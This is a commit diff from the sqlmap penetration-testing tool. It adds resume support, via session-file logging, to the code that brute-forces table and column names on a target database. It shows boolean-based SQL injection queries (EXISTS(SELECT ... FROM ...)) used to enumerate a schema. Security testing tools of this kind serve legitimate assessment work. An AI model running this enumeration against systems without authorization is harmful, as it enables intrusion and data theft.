resume of brute forced data is now available

2025-12-06 20:51:31 +00:00 · 2010-12-27 14:17:20 +00:00
parent c7a160bf72
commit 9fb0e0fc85
5 changed files with 101 additions and 11 deletions
--- a/lib/techniques/brute/use.py
+++ b/lib/techniques/brute/use.py
@@ -11,6 +11,7 @@ import threading
 import time

 from lib.core.common import clearConsoleLine
+from lib.core.common import dataToSessionFile
 from lib.core.common import dataToStdout
 from lib.core.common import filterListValue
 from lib.core.common import getFileItems
@@ -26,6 +27,7 @@ from lib.core.enums import DBMS
 from lib.core.exception import sqlmapMissingMandatoryOptionException
 from lib.core.exception import sqlmapThreadException
 from lib.core.settings import METADB_SUFFIX
+from lib.core.session import safeFormatString
 from lib.request import inject

 def tableExists(tableFile, regex=None):
@@ -59,13 +61,19 @@ def tableExists(tableFile, regex=None):
            tbllock.release()

            if conf.db and not conf.db.endswith(METADB_SUFFIX):
-                table = "%s.%s" % (conf.db, table)
-            result = inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %d FROM %s)", (randomInt(1), table)))
+                fullTableName = "%s.%s" % (conf.db, table)
+            else:
+                fullTableName = table
+            result = inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %d FROM %s)", (randomInt(1), fullTableName)))

            iolock.acquire()
            if result:
                retVal.append(table)

+                dataToSessionFile("[%s][%s][%s][TABLE_EXISTS][%s]\n" % (conf.url,\
+                  kb.injection.place, safeFormatString(conf.parameters[kb.injection.place]),\
+                  safeFormatString(fullTableName)))
+
                if conf.verbose in (1, 2):
                    clearConsoleLine(True)
                    infoMsg = "\r[%s] [INFO] retrieved: %s\n" % (time.strftime("%X"), table)
@@ -227,13 +235,17 @@ def columnExists(columnFile, regex=None):
        columns = {}

        for column in retVal:
-            result = inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %s FROM %s WHERE RND(%s)>0)", (column, table, column)))
+            result = inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %s FROM %s WHERE ROUND(%s)>0)", (column, table, column)))

            if result:
                columns[column] = 'numeric'
            else:
                columns[column] = 'non-numeric'

+            dataToSessionFile("[%s][%s][%s][COLUMN_EXISTS][%s..%s %s]\n" % (conf.url, kb.injection.place,\
+              safeFormatString(conf.parameters[kb.injection.place]), safeFormatString(table),\
+              safeFormatString(column), safeFormatString(columns[column])))
+
        kb.data.cachedColumns[conf.db] = {conf.tbl: columns}

    return kb.data.cachedColumns